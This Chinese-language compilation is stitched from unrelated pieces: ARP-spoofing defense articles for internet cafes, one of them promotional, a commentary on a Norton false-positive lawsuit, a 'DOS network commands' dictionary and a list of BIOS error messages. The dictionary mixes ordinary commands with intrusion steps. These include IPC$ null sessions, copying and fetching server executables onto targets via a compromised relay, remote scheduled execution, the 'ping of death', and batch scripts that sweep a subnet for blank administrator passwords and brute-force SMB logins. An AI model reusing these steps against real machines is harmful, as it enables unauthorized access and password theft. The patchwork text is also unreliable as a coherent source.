1、查看机器流量:对于在网络执法官监控范围内的客户机,在主界面中,点一下客户机的网卡,然后查看“本机状态”就可以看到这台机器的流量了。网络执法官与Sniffer软件一样,都可以查看网络中客户机的数据流量,但网络执法官不如Sniffer的流量显示方便直观。

2、智能监控:运行网络执法官软件后,可以通过“网卡”菜单中的“权限”限制一部分机器上网,这个功能很容易被捣乱分子利用来搞破坏。机器上安装并运行网络执法官软件后,机器图标在网络执法官软件中是红色的,其他正常运行的机器是淡绿色。红色代表机器处于网络混杂模式,利用这点可以轻松找到运行网络执法官软件的机器,从而就可以找到搞破坏者所在的机器了。但是,在手工监控时一定要注意,我们本机也是安装了网络执法官软件的,机器也处于网络混杂模式,千万不要把自己清除出去了。

如果发现网络中有捣乱者,网络执法官的监控功能会自动发出警报的。可以在网络执法官“设置”菜单中找到“安全”选项,设置管理机器的IP,当网络中有破坏者捣乱时,机器就会自动发出声音提示。这一智能监控功能,大大方便了对一些利用网络执法官捣乱者的监控。

三、典型应用——封杀“传奇杀手木马程序”

传奇杀手病毒,是专门为了盗窃传奇帐号和密码而开发的一种木马软件,通过对局域网进行ARP欺骗,虚拟网吧网关地址以收集局域网中传奇游戏登陆信息并进行分析,从而得到用户信息的破坏性木马软件。

传奇杀手木马程序的出现,使很多网吧用户受到了攻击,有一些用户在安装有传奇多面手木马程序的网吧运行传奇程序,结果帐号和密码被盗,网吧老板为此不得不赔偿用户的经济损失。盛大密保虽然可以解决帐号和密码被盗的难题,但一些用户不愿意增加成本来保护自己帐号和密码的安全。因此,传奇杀手木马程序成为令网吧维护人员头疼的一大技术难题。

想要监控传奇杀手木马程序,必须先搞清楚它的工作流程。首先,它将安装了传奇杀手机器的MAC通过ARP欺骗广播至局域网,使局域网中的工作站误认为本机是网络的网关。该流程会造成局域网与Internet连接中断,使游戏与服务器断开连接。当用户重新启动游戏并进行帐号登陆时,帐户信息并不会直接通过网关传递到代理服务器,而是把信息传送到正在进行ARP欺骗的传奇杀手软件中。传奇杀手自身有对传奇帐号的解密手段,从而可以轻松获得该帐户的真实用户名及密码,达到窃取玩家帐号的目的。由此可以看出,使用网络执法官并配合ARP命令,对传奇木马有一定的预防作用。

在没有网络执法官的情况下,可以使用ARP命令检查网络中是否有人使用传奇杀手木马程序。根据传奇杀手木马的原理,传奇杀手是制造虚假的网关IP地址和MAC地址,因此在客户机上使用ARP -a命令查看,如果有重复的MAC地址,则可以断定网络中有人使用传奇杀手木马程序。要想查到在哪一台机器上安装了传奇杀手木马,可以使用Ipbook类似的工具,查看当前网络中所有机器的MAC地址,并加以对比。由于运行传奇杀手木马程序的机器IP地址被更改,只能通过查询机器的MAC地址找到该机器,找到该机器后,将机器重新启动,再查找传奇杀手程序并删除就可以了。

如果用网络执法官就容易多了,其预防封杀传奇杀手方案如下:

1、传奇杀手与网络执法官的工作原理比较

细心的网管不难发现,网络执法官的工作原理与传奇杀手的工作原理相比,在某些方面是极为相似的。网络执法官在对网络中的机器进行管理时,运行网络执法的机器,通过ARP欺骗发给被管理的电脑一个假的网关IP地址及对应的MAC,使其找不到网关真正的MAC地址,这样就可以禁止机器上网。对于传奇杀手木马程序,当此程序工作时,也是通过安装此程序的机器发ARP欺骗给网络中的机器,ARP的欺骗信息也是一个虚假的网关IP及对应的MAC地址。

由此可以发现,网络执法官与传奇杀手木马程序的工作原理是基本相同的。如果在同一个网络中,分别在两台机器上安装了网络执法官程序,由于网络执法官的工作在混杂模式下,同时启动后,通过任何一台机器的网络执法官程序都可以看到,网络中有两台机器处于混杂模式下工作。这样,可以通过网络执法官程序看到另外一台安装有网络执法官程序机器的MAC地址,从而轻松找到另外一台安装有网络执法官程序的机器。

2、彻底封杀传奇杀手木马程序

根据传奇杀手木马程序工作原理,传奇杀手也是向网络广播虚假的网关地址及MAC地址消息,这是否意味着,当在有传奇杀手程序工作的网络中安装网络执法官程序后,可以看到有两台机器也是处在网络混杂模式下?经过小片的实验证实,传奇杀手木马程序与网络执法官程序的工作原理是一致的。只要网络中有传奇杀手程序在运行,就可以通过网络执法官程序来监控。

为彻底封杀传奇杀手木马程序,有效保证用户传奇帐号和密码的安全。可以在网吧收银机端安装网络执法官程序,并且按照上文的叙述设置智能监控。当网络执法官监控程序发现网络中有传奇杀手木马程序工作时,会自动发生声音警报,以此来警告来上网的用户。这样技术人员就可以在第一时间内发现传奇杀手木马程序,然后用最快的时间关闭传奇杀手程序。

防范 ARP的欺骗 让路由器能够先天免疫

作者:dingdd 来源:赛迪网

目前ARP欺骗攻击已经成了破坏网吧经营的罪魁祸首,是网吧老板和网管员的心腹大患。现在已知的ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。

ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。

第一种ARP欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,“网络掉线了”。

一般来说,ARP欺骗攻击的后果非常严重,大多数情况下会造成大面积掉线。有些网管员对此不甚了解,出现故障时,认为PC没有问题,交换机没掉线的“本事”,电信也不承认宽带故障。而且如果第一种ARP欺骗发生时,只要重启路由器,网络就能全面恢复,那问题一定是在路由器了。为此,宽带路由器背了不少“黑锅”。

作为网吧路由器的厂家,对防范ARP欺骗不得已做了不少份内、份外的工作。一、在宽带路由器中把所有PC的IP-MAC输入到一个静态表中,这叫路由器IP-MAC绑定。二、力劝网管员在内网所有PC上设置网关的静态ARP信息,这叫PC机IP-MAC绑定。一般厂家要求两个工作都要做,称其为IP-MAC双向绑定。

方法是有效的,但工作很繁琐,管理很麻烦。每台PC绑定本来就费力,在路由器中添加、维护、管理那么长长的一串列表,更是苦不堪言。一旦将来扩容调整,或更换网卡,又很容易由于疏忽造成混乱。如果您有所担心,那么不妨选用欣向网吧路由IXP机种,它可以使您宽心一些。因为欣向路由器根本不需要IP-MAC绑定,没有那长长的一串地址表。对付ARP,您只要做PC的单向绑定就可以了。该路由能够有效拒绝ARP对网关的欺骗,它是先天免疫的!

欣向路由的ARP先天免疫取决于它的二个有力的技术措施。一是独特的NAT处理机制,二是网关的主动防范机制。

产品对NAT的处理不同于通用协议栈的方式,它在原有的网络协议基础上,进行了强化、保护和扩容。虽然NAT是标准的网络协议,但实现方法可以各显其能,保证殊途同归就行。ARP欺骗只对公开的、通用的系统起作用,它利用了通用系统工作方式上的漏洞,而对NAT实现机制却无能为力,因为NAT设计了强有力的保护字段。这就是欣向路由能够对ARP先天免疫的原理。

另外,为对抗假冒网关的ARP欺骗,产品设计了网关的ARP广播机制,它以一个可选定的频次,向内网宣布正确的网关地址,维护网关的正当权益。在暂时无法及时清除ARP病毒,网管员还没有做PC上的IP-MAC绑定时,它能在一定程度上维持网络的运行,避免灾难性后果,赢取系统修复的时间。这就是ARP主动防范机制。

不过,如果不在PC上绑定IP-MAC,虽然有主动防范机制,但网络依然在带病运行。因为这种ARP是内网的事情,是不通过路由器的。让路由器插手只能做到对抗,不能根绝。ARP太猖獗时,就会发生时断时续的故障,那是主动防范机制在与ARP欺骗进行拉锯式的斗争。为此,产品还专门提供了一个ARP欺骗侦测、定位、防范的工具软件,免费发放给所有的网吧,帮助网管员们发现ARP欺骗的存在,为清除ARP欺骗源提供工作辅佐,并加入了欣向主动防范机制,有效对付ARP欺骗。

尽管如此,仍然提醒广大的网吧网管员,为了一劳永逸,还是费点力为每台PC做IP-MAC绑定吧,这样可以彻底根除ARP欺骗带来的烦恼。况且,路由只需要单向绑定,已经为您省去了另一半更繁琐的工作,并且设置时不需要重启路由器断网。路由器本身不怕ARP,您再做好PC上的绑定,让PC也不怕ARP,双管齐下,您的网吧就可以高枕无忧了。

诺顿索赔案可能是闹剧

诺顿索赔案可能是闹剧

诺顿误杀事件发生以来,要求诺顿赔偿的呼声越来越高。在众多企业用户尚未提出索赔的情况下,某个人用户率先提出了赔偿要求。据5月26日北京晨报报道:诺顿软件用户刘先生,因“误杀”事件导致电脑中大量数据丢失,日前已向海淀法院递交诉状,提起首例赔偿案。据了解,法院已经收下了刘先生的诉讼材料,需要经过审查才能决定是否立案。

  刘先生的代理人张律师表示,此次“误杀”事件,造成刘先生电脑内的文件全部丢失,损失至少10万元。当时刘先生正在准备投招标工作的文件全部丢失,同时,因为电脑瘫痪无法在网络上进行股票交易。事件对刘先生造成的损失中,主要包括三部分内容,其一是因“误杀”造成的股票交易损失,其二是对正版操作系统造成的损害,其三是刘先生在修理电脑的过程中,产生的误工费等费用。刘先生在诉状中向诺顿杀毒软件所属的赛门铁克(北京)公司索赔交通费、误工费、财产损失费等共计5万元。(5月26日北京晨报)

  本来就对个人用户索赔不看好的笔者看到这则新闻后不由得哑然失笑,这“诺顿误杀首例索赔”案太过于幼稚,简直就可以称为是“讹诈”。这位刘先生及其代理律师虽然精通数学和法律却是十足的“电脑盲”,如果这起诉讼立案的话,很有可能会成为国外公司耻笑中国消费者的借口。

  从电脑的使用角度看,诺顿误杀系统文件造成的电脑瘫痪的确会对股票交易等造成影响,但是“造成刘先生电脑内的文件全部丢失,损失至少10万元”的说法则过于牵强。

  系统崩溃是不会造成电脑原有储存信息丢失的,这是一个常识,在正确的恢复系统甚至重做系统的情况下,储存的文件信息会保存完好。刘先生的所谓“造成电脑内文件丢失”是一个完全不合理的诉讼要求,其索赔表面上符合法律常理实质上却违背常规电脑技术。如果诺顿公司以此为理由反驳刘先生,不知道他当做何解释。说不定刘先生会搬起石头砸自己的脚。

  当然,刘先生可以有一种为自己解释的途径,那就是自己正在输入文件的同时电脑系统崩溃造成文件无法保存而丢失。不过,这个解释会因为没有证据可查而变得异常困难。

  一个完全不符合行业技术要求的诉讼案件是必败无疑的,说当事人会被诺顿笑话虽然夸张但很有可能。出于正义,我对诺顿也有意见;但出于公理,我很难相信刘先生真有那所谓十来万的损失。

  这宗所谓的“诺顿误杀首例索赔案”将来的命运会如何我们不得而知,但可以肯定地是它会给后来人一个教训:先弄懂电脑常识再去打官司,不管是当事人还是律师。

  义愤是解决不了任何问题的,本来名正言顺的受害者要是背负恶名的话,我想这“诺顿误杀首例索赔案”很有可能会成为一场闹剧。

绝对实用 DOS下网络命令及其说明锦集

DOS命令字典

一:

net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:

net use h: \\ip\c$ 登陆后映射对方C:到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

net start 查看开启了哪些服务 net localgroup administrators 用户名 /add

net start 服务名  开启服务;(如:net start telnet, net start schedule)

net stop 服务名 停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况,常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于Windows NT及XP(Windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

二:

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)

move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP(属telnet登陆后的命令)

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:

xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送

tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)

route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface

arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件(目录)的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性

dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序,并显示出:请按任意键继续....

if 在批处理程序中执行条件处理(更多说明见if命令及变量)

goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)

call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)

for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)

echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )

三:

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS

md 目录名 创建目录

replace 源文件 要替换文件的目录 替换文件

ren 原文件名 新文件名 重命名文件名

tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称

type 文件名 显示文本文件的内容

more 文件名 逐屏显示输出文件

doskey 要锁定的命令=字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径\可执行文件的文件名 为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?

regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;

regedit /e 注册表文件名 导出注册表

cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。

cacls 文件名 查看文件的访问用户权限列表

REM 文本内容 在批处理文件中添加注解

netsh 查看或更改本地网络配置情况

四:

IIS服务命令:

iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)

iisreset /start或stop 启动(停止)所有Internet服务

iisreset /restart 停止然后重新启动所有Internet服务

iisreset /status 显示所有Internet服务状态

iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动

iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机

iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务

iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。

FTP 命令: (后面有详细说明内容)

ftp的命令行格式为:

ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。

-d 使用调试方式。

-n 限制ftp的自动登录,即不使用.netrc文件。

-g 取消全局文件名。

help [命令] 或 ?[命令] 查看命令说明

bye 或 quit 终止主机FTP进程,并退出FTP管理方式.

pwd 列出当前远端主机目录

put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中

get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中

mget [remote-files] 从远端主机接收一批文件至本地主机

mput local-files 将本地主机中一批文件传送至远端主机

dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件

ascii 设定以ASCII方式传送文件(缺省值)

bin 或 image 设定以二进制方式传送文件

bell 每完成一次文件传送,报警提示

cdup 返回上一级目录

close 中断与远程服务器的ftp会话(与open对应)

open host[port] 建立指定ftp服务器连接,可指定连接端口

delete 删除远端主机中的文件

mdelete [remote-files] 删除一批文件

mkdir directory-name 在远端主机中建立目录

rename [from] [to] 改变远端主机中的文件名

rmdir directory-name 删除远端主机中的目录

status 显示当前FTP的状态

system 显示远端主机系统类型

user user-name [password] [account] 重新以别的用户名登录远端主机

open host [port] 重新建立一个新的连接

prompt 交互提示模式

macdef 定义宏命令

lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录

chmod 改变远端主机的文件权限

case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母

cd remote-dir 进入远程主机目录

cdup 进入远程主机目录的父目录

! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip

五:

MYSQL 命令:

mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。

(例:mysql -h110.110.110.110 -Uroot -P123456

注:u与root可以不用加空格,其它也一样)

exit 退出MYSQL

mysqladmin -u用户名 -p旧密码 password 新密码 修改密码

grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)

show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。

use mysql;

show tables; 显示库中的数据表

describe 表名; 显示数据表的结构

create database 库名; 建库

use 库名;

create table 表名 (字段设定列表);建表

drop database 库名;

drop table 表名; 删库和删表

delete from 表名; 将表中记录清空

select * from 表名; 显示表中的记录

mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。

win2003系统下新增命令(实用部份):

shutdown /参数 关闭或重启本地或远程主机。

参数说明:/S 关闭主机,/R 重启主机, /T 数字设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。

例:shutdown /r /t 0 立即重启本地主机(无延时)

taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。

参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。

tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。

参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。

六:

Linux系统下基本命令: 要区分大小写

uname 显示版本信息(同win2K的 ver)

dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)

pwd 查询当前所在的目录位置

cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。

cat 文件名 查看文件内容

cat >abc.txt 往abc.txt文件中写上内容。

more 文件名 以一页一页的方式显示一个文本文件。

cp 复制文件

mv 移动文件

rm 文件名 删除文件,rm -a 目录名删除目录及子目录

mkdir 目录名 建立目录

rmdir 删除子目录,目录内没有文档。

chmod 设定档案或目录的存取权限

grep 在档案中查找字符串

diff 档案文件比较

find 档案搜寻

date 现在的日期、时间

who 查询目前和你使用同一台机器的人以及Login时间地点

w 查询目前上机者的详细资料

whoami 查看自己的帐号名称

groups 查看某人的Group

passwd 更改密码

history 查看自己下过的命令

ps 显示进程状态

kill 停止某进程

gcc 黑客通常用它来编译C语言写的文件

su 权限转换为指定使用者

telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。

ftp ftp连接上某服务器(同win2K)

附:批处理命令与变量

1:for命令及变量 基本格式:

FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。

批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }

command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开

command_parameters:为特定命令指定参数或命令行开关

IN (set):指在(set)中取值;DO command :指执行command

参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:\pass.txt)时 }。

用法举例:

@echo off

echo 用法格式:test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt

存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。

/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。

@echo off

echo 用法格式:ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200

存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。

电脑各种错误信息的中文意思(菜鸟版)

一、BIOS中的提示信息

提示信息 说明

Drive A error 驱动器A错误

System halt 系统挂起

Keyboard controller error 键盘控制器错误

Keyboard error or no keyboard present 键盘错误或者键盘不存在

BIOS ROM checksum error BIOS ROM 校验错误

Single hardisk cable fail 当硬盘使用Cable选项时硬盘安装位置不正确

FDD Controller Failure BIOS 软盘控制器错误

HDD Controller Failure BIOS 硬盘控制器错误

Driver Error 驱动器错误

Cache Memory Bad, Do not Enable Cache 高速缓存Cache损坏,不能使用

Error: Unable to control A20 line 错误提示:不能使用A20地址控制线

Memory write/Read failure 内存读写失败

Memory allocation error 内存定位错误

CMOS Battery state Low CMOS没电了

Keyboard interface error 键盘接口错误

Hard disk drive failure 加载硬盘失败

Hard disk not present 硬盘不存在

Floppy disk(s) fail (40) 软盘驱动器加载失败,一般是数据线插反,电源线没有插接,CMOS内部软驱设置错误

CMOS checksum error-efaults loaded. CMOS校验错误,装入缺省(默认)设置

  二、BIOS刷新失败后,Bootblock启动时出现的提示信息

提示信息 说明

Detecting floppy drive A media... 检测软驱A的格式

Drive media is : 1.44Mb1.2Mb 720Kb 360K 驱动器格式是1.44Mb、12Mb、720kb、360kb的一种

DISK BOOT FAILURE, INSERT SYSTEM DISK AND PRESS ENTER 磁盘引导失败,插入系统盘后按任意键继续

  三、MBR主引导区提示信息

提示信息 说明

Invalid partition table 无效的分区表

Error loading operating sy stem 不能装入引导系统

Missing operating system 系统引导文件丢失

  说明:如果在计算机启动过程中,在硬件配置清单下方(也就时在平时正常启动时出现Starting Windows 98…的地方)出现不可识别字符,此时可判断硬盘分区表损坏。如果你的硬盘上有重要资料,这时你不要轻易进行分区,可找专业的数据恢复公司。

  四、DOS活动分区中的提示信息

提示信息 说明

Invalid system disk 无效的系统盘

Disk I/O error, Replace the disk and press any key. 磁盘I/O错误,替换磁盘后按任意键(当C盘系统文件丢失或被破坏时出现该提示信息。这时可能SYS C:为修复系统文件)

Invalid Media Type reaching Drive C: 无效的C盘媒体格式说明。也就是C盘没有格式化或者是其他操作系统的磁盘格式如NTFS

Invalid Boot Diskette Boot Failure 无效的启动盘,启动失败

  五、IO.SYS中的提示信息

提示信息 说明

Insert diskette for drive and press any key when ready 插入磁盘到驱动器中后按任意键

Your program caused a divide overflow error

If the problem persists, contact your program vendor 你的程序导致溢出错误。如果该问题还存在,请联系你的程序供应商

Windows has disabled direct disk access to protect your long filenames Windows不能直接访问受保护的长文件名

The system has been halted. Press Ctrl+Alt+Del to restart your computer 系统挂起,按Ctrl+Alt+Del重新启动你的计算机

You started your computer with a version of MS-DOS incompatible with this version of Windows. Insert a Startup diskette matching this version of Windows and then restart 你启动的MS-DOS版本与Windows版本不兼容,请插入与Windows版本匹配的系统盘后再重启

This version of Windows requires a 386 or better processor 该Windows版本需要386以后的CPU支持

A20 hardware error. Contact technical support to identify the problem 地址线A20错误。联系技术支持来识别该问题

Starting Windows 98... 正在启动Windows 98……

Windows 98 is now starting your MS-DOS-based program Windows 98正在启动基于MS-DOS的程序

Windows 98 is now restarting... Windows 98正在重新启动

Press Esc now to cancel MS-DOS mode and restart Windows 98... 按Esc退出MS-DOS 模式,重新启动Windows 98…

There is an unrecognized command in your CONFIG.SYS file 在你的CONFIG.SYS文件中有不可识别的命令

The following command in your CONFIG.SYS file is incorrect: 在你的CONFIG.SYS有下列错误命令

The sector size specified in this file is too large: 该文件中指定的扇区太大

The following file is missing or corrupted: WIN.COM COMMAND.COM 下列文件丢失或被破坏:WIN.COM和COMMAND.COM

There is an invalid country code or code page in your CONFIG.SYS file 在你的CONFIG.SYS里有一个无效的国家代码

There is an error in the COUNTRY command in your CONFIG.SYS file 在你的CONFIG.SYS里有一个错误的设置国家命令

There is not enough memory for the COUNTRY.SYS file 没有足够的内存来加载COUNTRY.SYS文件

